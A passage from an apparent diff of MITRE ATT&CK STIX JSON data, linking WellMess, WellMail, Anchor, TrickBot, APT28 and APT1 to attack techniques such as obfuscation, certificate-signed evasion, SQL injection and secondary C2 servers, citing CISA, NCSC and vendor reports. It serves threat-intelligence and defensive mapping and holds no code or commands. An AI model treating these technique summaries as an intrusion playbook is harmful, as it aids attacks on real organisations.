"relationship--364d9326-12af-4449-924c-8063f4b3aa41", + "type": "relationship", + "modified": "2020-09-30T14:29:28.434Z", + "created": "2020-09-30T14:29:28.434Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--3a4197ae-ec63-4162-907b-9a073d1157e4", + "target_ref": "attack-pattern--f7c0689c-4dbd-489b-81be-7cb7c7079ade", + "external_references": [ + { + "source_name": "CISA WellMess July 2020", + "url": "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b", + "description": "CISA. (2020, July 16). MAR-10296782-2.v1 \u2013 WELLMESS. Retrieved September 24, 2020." + } + ], + "description": "[WellMess](https://attack.mitre.org/software/S0514) can use junk data in the Base64 string for additional obfuscation.(Citation: CISA WellMess July 2020)", + "relationship_type": "uses", + "id": "relationship--ef407819-f7e3-477c-8586-42ba108e5786", + "type": "relationship", + "modified": "2020-09-30T14:52:08.973Z", + "created": "2020-09-30T14:52:08.973Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--3a4197ae-ec63-4162-907b-9a073d1157e4", + "target_ref": "attack-pattern--04fd5427-79c7-44ea-ae13-11b24778ff1c", + "external_references": [ + { + "source_name": "CISA WellMess July 2020", + "url": "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b", + "description": "CISA. (2020, July 16). MAR-10296782-2.v1 \u2013 WELLMESS. Retrieved September 24, 2020." + } + ], + "description": "[WellMess](https://attack.mitre.org/software/S0514) has used Base64 encoding to uniquely identify communication to and from the C2.(Citation: CISA WellMess July 2020)", + "relationship_type": "uses", + "id": "relationship--86dddc68-9032-4467-be3c-a48d3bacfd06", + "type": "relationship", + "modified": "2020-09-30T14:52:08.986Z", + "created": "2020-09-30T14:52:08.986Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--3a4197ae-ec63-4162-907b-9a073d1157e4", + "target_ref": "attack-pattern--2aed01ad-3df3-4410-a8cb-11ea4ded587c", + "external_references": [ + { + "source_name": "CISA WellMess July 2020", + "url": "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b", + "description": "CISA. (2020, July 16). MAR-10296782-2.v1 \u2013 WELLMESS. Retrieved September 24, 2020." + } + ], + "description": "[WellMess](https://attack.mitre.org/software/S0514) can identify domain group membership for the current user.(Citation: CISA WellMess July 2020)", + "relationship_type": "uses", + "id": "relationship--a8b6a519-2159-46f0-916d-1f7a3d940eea", + "type": "relationship", + "modified": "2020-09-30T14:52:09.005Z", + "created": "2020-09-30T14:52:09.005Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--3a4197ae-ec63-4162-907b-9a073d1157e4", + "target_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104", + "external_references": [ + { + "source_name": "CISA WellMess July 2020", + "url": "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b", + "description": "CISA. (2020, July 16). MAR-10296782-2.v1 \u2013 WELLMESS. Retrieved September 24, 2020." + } + ], + "description": "[WellMess](https://attack.mitre.org/software/S0514) can collect the username on the victim machine to send to C2.(Citation: CISA WellMess July 2020)", + "relationship_type": "uses", + "id": "relationship--0b126adc-3173-4751-978f-96b72913a346", + "type": "relationship", + "modified": "2020-09-30T14:52:09.009Z", + "created": "2020-09-30T14:52:09.009Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--959f3b19-2dc8-48d5-8942-c66813a5101a", + "target_ref": "attack-pattern--b18eae87-b469-4e14-b454-b171b416bc18", + "external_references": [ + { + "source_name": "CISA WellMail July 2020", + "url": "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198c", + "description": "CISA. (2020, July 16). MAR-10296782-3.v1 \u2013 WELLMAIL. Retrieved September 29, 2020." + }, + { + "source_name": "NCSC APT29 July 2020", + "url": "https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development-V1-1.pdf", + "description": "National Cyber Security Centre. (2020, July 16). Advisory: APT29 targets COVID-19 vaccine development. Retrieved September 29, 2020." + } + ], + "description": "[WellMail](https://attack.mitre.org/software/S0515) has been observed using TCP port 25, without using SMTP, to leverage an open port for secure command and control communications.(Citation: CISA WellMail July 2020)(Citation: NCSC APT29 July 2020)", + "relationship_type": "uses", + "id": "relationship--31b54e57-8a8c-4c0f-9170-b3694dd82005", + "type": "relationship", + "modified": "2020-10-09T15:38:41.969Z", + "created": "2020-09-30T15:07:31.119Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "attack-pattern--40f5caa0-4cb7-4117-89fc-d421bb493df3", + "target_ref": "attack-pattern--0458aab9-ad42-4eac-9e22-706a95bafee2", + "relationship_type": "subtechnique-of", + "id": "relationship--22dd54d0-4285-444a-9bbd-ce3b3bd81b67", + "type": "relationship", + "modified": "2020-09-30T17:09:31.964Z", + "created": "2020-09-30T17:09:31.964Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "attack-pattern--197ef1b9-e764-46c3-b96c-23f77985dc81", + "target_ref": "attack-pattern--0458aab9-ad42-4eac-9e22-706a95bafee2", + "relationship_type": "subtechnique-of", + "id": "relationship--5cc8aab6-8697-4277-8a12-290bfd15705d", + "type": "relationship", + "modified": "2020-10-01T00:40:45.362Z", + "created": "2020-10-01T00:40:45.362Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "attack-pattern--79da0971-3147-4af6-a4f5-e8cd447cd795", + "target_ref": "attack-pattern--0458aab9-ad42-4eac-9e22-706a95bafee2", + "relationship_type": "subtechnique-of", + "id": "relationship--78bde505-a353-4cae-a978-f87de382f3fd", + "type": "relationship", + "modified": "2020-10-01T00:44:24.068Z", + "created": "2020-10-01T00:44:24.068Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "attack-pattern--60c4b628-4807-4b0b-bbf5-fdac8643c337", + "target_ref": "attack-pattern--0458aab9-ad42-4eac-9e22-706a95bafee2", + "relationship_type": "subtechnique-of", + "id": "relationship--5221fc94-cddd-416a-b027-67bc7a68ced1", + "type": "relationship", + "modified": "2020-10-01T00:48:09.642Z", + "created": "2020-10-01T00:48:09.642Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "attack-pattern--31225cd3-cd46-4575-b287-c2c14011c074", + "target_ref": "attack-pattern--0458aab9-ad42-4eac-9e22-706a95bafee2", + "relationship_type": "subtechnique-of", + "id": "relationship--46b33aec-21e6-4a5d-b99d-6ce4396a16d8", + "type": "relationship", + "modified": "2020-10-01T00:49:05.550Z", + "created": "2020-10-01T00:49:05.550Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "attack-pattern--88d31120-5bc7-4ce3-a9c0-7cf147be8e54", + "target_ref": "attack-pattern--0458aab9-ad42-4eac-9e22-706a95bafee2", + "relationship_type": "subtechnique-of", + "id": "relationship--e134a00e-8d72-4c3d-a5b1-3f9c6e1bd330", + "type": "relationship", + "modified": "2020-10-01T00:50:30.025Z", + "created": "2020-10-01T00:50:30.025Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "attack-pattern--f9cc4d06-775f-4ee1-b401-4e2cc0da30ba", + "target_ref": "attack-pattern--7e3beebd-8bfe-4e7b-a892-e44ab06a75f9", + "relationship_type": "subtechnique-of", + "id": "relationship--d061e030-6ad7-457d-a909-5ca6f7282762", + "type": "relationship", + "modified": "2020-10-01T00:51:28.557Z", + "created": "2020-10-01T00:51:28.557Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "attack-pattern--c2f59d25-87fe-44aa-8f83-e8e59d077bf5", + "target_ref": "attack-pattern--7e3beebd-8bfe-4e7b-a892-e44ab06a75f9", + "relationship_type": "subtechnique-of", + "id": "relationship--4c42863f-8f57-4948-afe3-922a30f193fa", + "type": "relationship", + "modified": "2020-10-01T00:54:30.974Z", + "created": "2020-10-01T00:54:30.974Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "attack-pattern--39cc9f64-cf74-4a48-a4d8-fe98c54a02e0", + "target_ref": "attack-pattern--7e3beebd-8bfe-4e7b-a892-e44ab06a75f9", + "relationship_type": "subtechnique-of", + "id": "relationship--4142c046-18da-4a55-8aad-84370121332d", + "type": "relationship", + "modified": "2020-10-01T00:55:17.851Z", + "created": "2020-10-01T00:55:17.851Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "attack-pattern--e196b5c5-8118-4a1c-ab8a-936586ce3db5", + "target_ref": "attack-pattern--7e3beebd-8bfe-4e7b-a892-e44ab06a75f9", + "relationship_type": "subtechnique-of", + "id": "relationship--976ffdd9-bc86-4bc6-80a0-736705f049f9", + "type": "relationship", + "modified": "2020-10-01T00:56:25.256Z", + "created": "2020-10-01T00:56:25.256Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "attack-pattern--810d8072-afb6-4a56-9ee7-86379ac4a6f3", + "target_ref": "attack-pattern--7e3beebd-8bfe-4e7b-a892-e44ab06a75f9", + "relationship_type": "subtechnique-of", + "id": "relationship--9175721d-ca74-4648-94e6-11e117a2cd12", + "type": "relationship", + "modified": "2020-10-01T00:58:35.342Z", + "created": "2020-10-01T00:58:35.342Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "attack-pattern--ae797531-3219-49a4-bccf-324ad7a4c7b2", + "target_ref": "attack-pattern--7e3beebd-8bfe-4e7b-a892-e44ab06a75f9", + "relationship_type": "subtechnique-of", + "id": "relationship--77559f07-2f75-4eab-962f-3705b9ad704b", + "type": "relationship", + "modified": "2020-10-01T01:01:00.257Z", + "created": "2020-10-01T01:01:00.257Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "attack-pattern--b1ccd744-3f78-4a0e-9bb2-2002057f7928", + "target_ref": "attack-pattern--cdfc5f0a-9bb9-4352-b896-553cfa2d8fd8", + "relationship_type": "subtechnique-of", + "id": "relationship--b6c09dbf-0934-42c5-a517-847128a0ce5a", + "type": "relationship", + "modified": "2020-10-01T01:08:41.201Z", + "created": "2020-10-01T01:08:41.201Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "attack-pattern--65013dd2-bc61-43e3-afb5-a14c4fa7437a", + "target_ref": "attack-pattern--cdfc5f0a-9bb9-4352-b896-553cfa2d8fd8", + "relationship_type": "subtechnique-of", + "id": "relationship--579bdadc-b080-49f1-be32-283b06444569", + "type": "relationship", + "modified": "2020-10-01T01:09:53.313Z", + "created": "2020-10-01T01:09:53.313Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "attack-pattern--274770e0-2612-4ccf-a678-ef8e7bad365d", + "target_ref": "attack-pattern--81033c3b-16a4-46e4-8fed-9b030dd03c4a", + "relationship_type": "subtechnique-of", + "id": "relationship--fc123d2e-3cd6-4d14-929c-8eb9c9a7cdd2", + "type": "relationship", + "modified": "2020-10-01T01:18:35.632Z", + "created": "2020-10-01T01:18:35.632Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "attack-pattern--3dc8c101-d4db-4f4d-8150-1b5a76ca5f1b", + "target_ref": "attack-pattern--81033c3b-16a4-46e4-8fed-9b030dd03c4a", + "relationship_type": "subtechnique-of", + "id": "relationship--b7f99597-3cbb-4cc4-a0d5-1d2abd84dbea", + "type": "relationship", + "modified": "2020-10-01T01:20:53.171Z", + "created": "2020-10-01T01:20:53.171Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "attack-pattern--212306d8-efa4-44c9-8c2d-ed3d2e224aa0", + "target_ref": "attack-pattern--edadea33-549c-4ed1-9783-8f5a5853cbdf", + "relationship_type": "subtechnique-of", + "id": "relationship--ee74a23f-5981-4601-8321-a5db7af73f77", + "type": "relationship", + "modified": "2020-10-01T01:33:01.536Z", + "created": "2020-10-01T01:33:01.536Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "attack-pattern--34b3f738-bd64-40e5-a112-29b0542bc8bf", + "target_ref": "attack-pattern--edadea33-549c-4ed1-9783-8f5a5853cbdf", + "relationship_type": "subtechnique-of", + "id": "relationship--4f2ee424-4550-48ac-b995-2cdae87f45f9", + "type": "relationship", + "modified": "2020-10-01T01:41:08.750Z", + "created": "2020-10-01T01:41:08.750Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "attack-pattern--1cec9319-743b-4840-bb65-431547bce82a", + "target_ref": "attack-pattern--edadea33-549c-4ed1-9783-8f5a5853cbdf", + "relationship_type": "subtechnique-of", + "id": "relationship--b316741b-8bd3-4af6-9d5c-76afca7b9012", + "type": "relationship", + "modified": "2020-10-01T01:42:25.082Z", + "created": "2020-10-01T01:42:25.082Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "attack-pattern--bbc3cba7-84ae-410d-b18b-16750731dfa2", + "target_ref": "attack-pattern--edadea33-549c-4ed1-9783-8f5a5853cbdf", + "relationship_type": "subtechnique-of", + "id": "relationship--c185a6ee-4897-49e0-801a-6c050054661f", + "type": "relationship", + "modified": "2020-10-01T01:48:15.601Z", + "created": "2020-10-01T01:48:15.601Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "attack-pattern--7807d3a4-a885-4639-a786-c1ed41484970", + "target_ref": "attack-pattern--ce0687a0-e692-4b77-964a-0784a8e54ff1", + "relationship_type": "subtechnique-of", + "id": "relationship--feccce31-b855-430b-a0f6-6e3a3eb41bf9", + "type": "relationship", + "modified": "2020-10-01T02:06:11.541Z", + "created": "2020-10-01T02:06:11.541Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "attack-pattern--a2fdce72-04b2-409a-ac10-cc1695f4fce0", + "target_ref": "attack-pattern--ce0687a0-e692-4b77-964a-0784a8e54ff1", + "relationship_type": "subtechnique-of", + "id": "relationship--757be841-a218-4d0e-bbe3-a138eea7692e", + "type": "relationship", + "modified": "2020-10-01T02:08:34.018Z", + "created": "2020-10-01T02:08:34.018Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "attack-pattern--e7cbc1de-1f79-48ee-abfd-da1241c65a15", + "target_ref": "attack-pattern--ce0687a0-e692-4b77-964a-0784a8e54ff1", + "relationship_type": "subtechnique-of", + "id": "relationship--b54dd734-7d12-4f69-89f7-d89e9090777a", + "type": "relationship", + "modified": "2020-10-01T02:11:47.282Z", + "created": "2020-10-01T02:11:47.282Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "attack-pattern--19401639-28d0-4c3c-adcc-bc2ba22f6421", + "target_ref": "attack-pattern--ce0687a0-e692-4b77-964a-0784a8e54ff1", + "relationship_type": "subtechnique-of", + "id": "relationship--4b23ce54-a782-4af5-99bd-8bc59c2893b2", + "type": "relationship", + "modified": "2020-10-01T02:14:18.100Z", + "created": "2020-10-01T02:14:18.100Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "attack-pattern--f4b843c1-7e92-4701-8fed-ce82f8be2636", + "target_ref": "attack-pattern--ce0687a0-e692-4b77-964a-0784a8e54ff1", + "relationship_type": "subtechnique-of", + "id": "relationship--21103c84-cbf8-48ee-b02f-edd13157bd89", + "type": "relationship", + "modified": "2020-10-01T02:17:46.135Z", + "created": "2020-10-01T02:17:46.135Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--5f1d4579-4e8f-48e7-860e-2da773ae432e", + "target_ref": "attack-pattern--4f9ca633-15c5-463c-9724-bdcd54fde541", + "external_references": [ + { + "source_name": "Medium Anchor DNS July 2020", + "url": "https://medium.com/stage-2-security/anchor-dns-malware-family-goes-cross-platform-d807ba13ca30", + "description": "Grange, W. (2020, July 13). Anchor_dns malware goes cross platform. Retrieved September 10, 2020." + } + ], + "description": "[Anchor](https://attack.mitre.org/software/S0504) can support windows execution via SMB shares.(Citation: Medium Anchor DNS July 2020)", + "relationship_type": "uses", + "id": "relationship--f7ebcffb-0397-430b-a19f-0f2f842d79ed", + "type": "relationship", + "modified": "2020-10-01T13:33:13.640Z", + "created": "2020-10-01T13:33:13.640Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--5f1d4579-4e8f-48e7-860e-2da773ae432e", + "target_ref": "attack-pattern--a9d4b653-6915-42af-98b2-5758c4ceee56", + "external_references": [ + { + "source_name": "Medium Anchor DNS July 2020", + "url": "https://medium.com/stage-2-security/anchor-dns-malware-family-goes-cross-platform-d807ba13ca30", + "description": "Grange, W. (2020, July 13). Anchor_dns malware goes cross platform. Retrieved September 10, 2020." + } + ], + "description": "[Anchor](https://attack.mitre.org/software/S0504) can execute payloads via shell scripting.(Citation: Medium Anchor DNS July 2020)", + "relationship_type": "uses", + "id": "relationship--51adc4b0-bf1b-4c55-ac6c-72b46560e833", + "type": "relationship", + "modified": "2020-10-01T13:33:13.771Z", + "created": "2020-10-01T13:33:13.771Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--5f1d4579-4e8f-48e7-860e-2da773ae432e", + "target_ref": "attack-pattern--32901740-b42c-4fdd-bc02-345b5dc57082", + "external_references": [ + { + "source_name": "Cyberreason Anchor December 2019", + "url": "https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware", + "description": "Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September 10, 2020." + } + ], + "description": "[Anchor](https://attack.mitre.org/software/S0504) has been signed with valid certificates to evade detection by security tools.(Citation: Cyberreason Anchor December 2019)", + "relationship_type": "uses", + "id": "relationship--7840f5de-3b13-486c-bde2-7ffc73998010", + "type": "relationship", + "modified": "2020-10-01T13:33:13.842Z", + "created": "2020-10-01T13:33:13.842Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--5f1d4579-4e8f-48e7-860e-2da773ae432e", + "target_ref": "attack-pattern--f24faf46-3b26-4dbb-98f2-63460498e433", + "external_references": [ + { + "source_name": "Cyberreason Anchor December 2019", + "url": "https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware", + "description": "Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September 10, 2020." + } + ], + "description": "[Anchor](https://attack.mitre.org/software/S0504) can use secondary C2 servers for communication after establishing connectivity and relaying victim information to primary C2 servers.(Citation: Cyberreason Anchor December 2019)", + "relationship_type": "uses", + "id": "relationship--f9fc4a7b-e8ba-4e50-b97f-9afabcfc73a8", + "type": "relationship", + "modified": "2020-10-01T13:33:13.867Z", + "created": "2020-10-01T13:33:13.867Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--00806466-754d-44ea-ad6f-0caf59cb8556", + "target_ref": "attack-pattern--42e8de7b-37b2-4258-905a-6897815e58e0", + "external_references": [ + { + "source_name": "Cyberreason Anchor December 2019", + "url": "https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware", + "description": "Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September 10, 2020." + } + ], + "description": "The [TrickBot](https://attack.mitre.org/software/S0266) downloader has used an icon to appear as a Microsoft Word document.(Citation: Cyberreason Anchor December 2019)", + "relationship_type": "uses", + "id": "relationship--a8126b8d-8dd7-4e12-a384-96dabb975725", + "type": "relationship", + "modified": "2020-10-05T17:44:46.781Z", + "created": "2020-10-01T13:39:19.763Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--00806466-754d-44ea-ad6f-0caf59cb8556", + "target_ref": "attack-pattern--f24faf46-3b26-4dbb-98f2-63460498e433", + "external_references": [ + { + "source_name": "Cyberreason Anchor December 2019", + "url": "https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware", + "description": "Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September 10, 2020." + } + ], + "description": "[TrickBot](https://attack.mitre.org/software/S0266) can use secondary C2 servers for communication after establishing connectivity and relaying victim information to primary C2 servers.(Citation: Cyberreason Anchor December 2019)", + "relationship_type": "uses", + "id": "relationship--3fa8155d-11ca-47de-902e-47e809d0ed64", + "type": "relationship", + "modified": "2020-10-01T13:41:54.436Z", + "created": "2020-10-01T13:41:54.436Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--bef4c620-0787-42a8-a96d-b7eb6e85917c", + "target_ref": "attack-pattern--d74c4a7e-ffbf-432f-9365-7ebf1f787cab", + "external_references": [ + { + "source_name": "US District Court Indictment GRU Oct 2018", + "url": "https://www.justice.gov/opa/page/file/1098481/download", + "description": "Brady, S . (2018, October 3). Indictment - United States vs Aleksei Sergeyevich Morenets, et al.. Retrieved October 1, 2020." + } + ], + "description": "In 2016, [APT28](https://attack.mitre.org/groups/G0007) conducted a distributed denial of service (DDoS) attack against the World Anti-Doping Agency.(Citation: US District Court Indictment GRU Oct 2018)", + "relationship_type": "uses", + "id": "relationship--5e9256c1-5ad5-4fb2-9a75-0267a2daae89", + "type": "relationship", + "modified": "2020-10-06T23:32:24.927Z", + "created": "2020-10-01T18:55:37.416Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--bef4c620-0787-42a8-a96d-b7eb6e85917c", + "target_ref": "attack-pattern--3f886f2a-874f-4333-b794-aa6075009b1c", + "external_references": [ + { + "source_name": "US District Court Indictment GRU Oct 2018", + "url": "https://www.justice.gov/opa/page/file/1098481/download", + "description": "Brady, S . (2018, October 3). Indictment - United States vs Aleksei Sergeyevich Morenets, et al.. Retrieved October 1, 2020." + } + ], + "description": "[APT28](https://attack.mitre.org/groups/G0007) has conducted SQL injection attacks against organizations' external websites.(Citation: US District Court Indictment GRU Oct 2018) ", + "relationship_type": "uses", + "id": "relationship--329d115e-2a1d-443e-800c-d28f5f11d6b9", + "type": "relationship", + "modified": "2020-10-06T19:05:10.977Z", + "created": "2020-10-01T18:55:37.399Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--bef4c620-0787-42a8-a96d-b7eb6e85917c", + "target_ref": "attack-pattern--40f5caa0-4cb7-4117-89fc-d421bb493df3", + "external_references": [ + { + "source_name": "FireEye APT28", + "description": "FireEye. (2015). APT28: A WINDOW INTO RUSSIA\u2019S CYBER ESPIONAGE OPERATIONS?. Retrieved August 19, 2015.", + "url": "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf" + }, + { + "source_name": "US District Court Indictment GRU Oct 2018", + "url": "https://www.justice.gov/opa/page/file/1098481/download", + "description": "Brady, S . (2018, October 3). Indictment - United States vs Aleksei Sergeyevich Morenets, et al.. Retrieved October 1, 2020." + } + ], + "description": "[APT28](https://attack.mitre.org/groups/G0007) registered domains imitating NATO, OSCE security websites, Caucasus information resources and other organizations.(Citation: FireEye APT28) (Citation: US District Court Indictment GRU Oct 2018)", + "relationship_type": "uses", + "id": "relationship--0d1605a9-9a62-401d-af07-84b481bddb66", + "type": "relationship", + "modified": "2020-10-02T02:08:23.917Z", + "created": "2020-10-02T02:08:23.917Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--6a2e693f-24e5-451a-9f88-b36a108e5662", + "target_ref": "attack-pattern--40f5caa0-4cb7-4117-89fc-d421bb493df3", + "external_references": [ + { + "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf", + "description": "Mandiant. (n.d.). APT1 Exposing One of China\u2019s Cyber Espionage Units. Retrieved July 18, 2016.", + "source_name": "Mandiant APT1" + } + ], + "description": "[APT1](https://attack.mitre.org/groups/G0006) has registered hundreds of domains for use in operations.(Citation: Mandiant APT1)", + "relationship_type": "uses", + "id": "relationship--40e49390-e8a5-4d91-8ec9-d05fb3b71149", 